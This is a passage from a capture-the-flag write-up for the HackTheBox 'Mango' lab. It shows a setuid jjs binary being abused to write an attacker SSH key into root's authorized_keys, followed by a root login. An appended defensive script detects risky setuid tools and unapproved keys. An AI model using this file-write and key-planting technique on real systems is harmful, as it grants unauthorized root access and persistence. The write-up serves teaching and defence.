jjs
Following up on the enumeration, I will attempt to exploit the SUID binary.
I was initially able to exploit the SUID binary and opened a shell session as the root user.
However, the shell session doesn’t appear to be responsive.
SSH Key Write
I can instead opt for the privileged file write operation to write my own SSH key into the authorized_keys file of the root user.
This is done on the assumption that the root user frequently authenticates to the SSH server, as enumerated with PEAS.
$ /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> var FileWriter = Java.type("java.io.FileWriter");
jjs> var fw=new FileWriter("/root/.ssh/authorized_keys");
jjs> fw.write("ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali");
jjs> fw.close();
jjs> exit()
Done
┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ ssh root@$IP -i ~/.ssh/id_ed25519
Enter passphrase for key '/home/kali/.ssh/id_ed25519':
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Sep 28 23:51:36 UTC 2023
System load: 0.14 Processes: 112
Usage of /: 37.1% of 19.56GB Users logged in: 1
Memory usage: 34% IP address for ens33: 10.10.10.162
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu Oct 10 08:33:27 2019
root@mango:~# whoami
root
root@mango:~# hostname
mango
root@mango:~# ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.162 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:ab29 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:ab29 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:ab:29 txqueuelen 1000 (Ethernet)
RX packets 19796171 bytes 3144002463 (3.1 GB)
RX errors 0 dropped 89 overruns 0 frame 0
TX packets 18691414 bytes 9751148436 (9.7 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 154733 bytes 12783433 (12.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 154733 bytes 12783433 (12.7 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
System Level Compromise
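For the defensive side of the technique above, the following added example (not part of the original write-up) audits a directory tree for setuid script-capable tools such as jjs and lists authorized_keys entries that are missing from an approved list. The tool-name list, the allowlist file format and path, and the function names are assumptions.

```bash
#!/bin/sh
# Added defensive example; the names and lists here are assumptions.

# Script-capable tools that should never be setuid (assumed list; jjs is
# the one this write-up abuses for a root-owned file write).
RISKY_NAMES="jjs jrunscript java python python3 perl ruby node bash sh"

# Print every setuid regular file under directory $1 whose basename is in
# RISKY_NAMES. Remediation for a hit is to drop the bit: chmod u-s <file>.
find_risky_suid() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r suid_file; do
        for risky in $RISKY_NAMES; do
            if [ "$(basename "$suid_file")" = "$risky" ]; then
                printf '%s\n' "$suid_file"
                break
            fi
        done
    done
}

# Print "keytype comment" for each entry in authorized_keys file $1 whose
# base64 key blob is not listed (one blob per line) in allowlist file $2.
unexpected_keys() {
    [ -f "$1" ] || return 0
    awk -v allow="$2" '
        BEGIN { while ((getline line < allow) > 0) ok[line] = 1 }
        /^[ \t]*(#|$)/ { next }            # skip comments and blank lines
        {
            # Options may precede the key type, so locate the type field.
            for (i = 1; i < NF; i++)
                if ($i ~ /^(ssh-|ecdsa-|sk-)/) {
                    if (!($(i + 1) in ok)) print $i, $(i + 2)
                    break
                }
        }
    ' "$1"
}

# Typical use (allowlist path is hypothetical):
#   find_risky_suid /usr
#   unexpected_keys /root/.ssh/authorized_keys /etc/ssh/root_keys.allow
```

Running both checks on a schedule and alerting on any output covers the misconfiguration (the setuid bit on jjs) and the persistence artifact (a new key in root's authorized_keys).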